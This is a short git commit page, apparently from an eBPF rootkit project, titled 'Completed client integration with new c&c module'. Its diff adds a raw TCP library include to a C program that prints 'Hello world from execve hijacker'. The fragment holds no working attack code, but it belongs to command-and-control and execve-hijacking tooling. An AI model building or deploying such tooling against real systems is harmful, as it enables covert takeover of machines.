Completed client integration with new c&c module.

This commit is contained in:
h3xduck
2022-02-17 06:21:09 -05:00
parent 431a019931
commit 9a47a2b15a
7 changed files with 60 additions and 4 deletions

View File

@@ -9,6 +9,8 @@
#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include "lib/RawTCP.h"
int main(int argc, char* argv[]){
printf("Hello world from execve hijacker\n");